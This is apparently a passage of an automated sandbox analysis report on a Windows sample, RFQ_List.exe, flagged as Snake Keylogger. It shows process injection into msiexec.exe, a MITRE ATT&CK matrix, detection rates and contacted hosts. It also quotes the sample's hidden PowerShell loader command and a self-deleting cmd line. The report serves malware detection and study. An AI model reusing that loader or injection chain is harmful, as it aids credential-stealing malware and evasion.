Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -595579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -595454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -595329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -595216s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848	Thread sleep time: -594110s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405846
Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_00406398 FindFirstFileW,FindClose,	0_2_00406398
Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599866	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599745	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598997	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596782	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595216	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\peritonealizing\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: msiexec.exe, 00000006.00000002.2667333235.00000000093B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: msiexec.exe, 00000006.00000002.2667333235.0000000009418000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000006.00000002.2679666191.0000000027303000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:

Source: C:\Users\user\Desktop\RFQ_List.exe	API call chain: ExitProcess graph end node			graph_0-2837
Source: C:\Users\user\Desktop\RFQ_List.exe	API call chain: ExitProcess graph end node			graph_0-3017

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_0480D8B8 LdrInitializeThunk,

1_2_0480D8B8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_List.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$noncuriousness=get-content -raw 'c:\users\user\appdata\local\peritonealizing\nomadeinvasioners\stofhandskernes\maidenliness.hal37';$objektiviserende=$noncuriousness.substring(53938,3);.$objektiviserende($noncuriousness)"
Source: C:\Users\user\Desktop\RFQ_List.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$noncuriousness=get-content -raw 'c:\users\user\appdata\local\peritonealizing\nomadeinvasioners\stofhandskernes\maidenliness.hal37';$objektiviserende=$noncuriousness.substring(53938,3);.$objektiviserende($noncuriousness)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_List.exe

Code function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406077

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5788, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5788, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	311 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	4 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ_List.exe	67%	ReversingLabs	Win32.Trojan.Generic
RFQ_List.exe	36%	Virustotal		Browse
RFQ_List.exe	100%	Avira	HEUR/AGEN.1333748

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe	100%	Avira	HEUR/AGEN.1333748
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe	67%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
drive.google.com	0%	Virustotal	Browse
drive.usercontent.google.com	1%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://drive.google.com/	1%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.185.206	true	false	0%, Virustotal, Browse	unknown
drive.usercontent.google.com	172.217.16.193	true	false	1%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/155.94.241.188	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2332064457.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://drive.google.com/	msiexec.exe, 00000006.00000002.2667333235.00000000093B0000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251C2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2334658847.0000000005EE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000003.2514226077.000000000942F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2667333235.000000000942B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002519E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://apis.google.com	msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
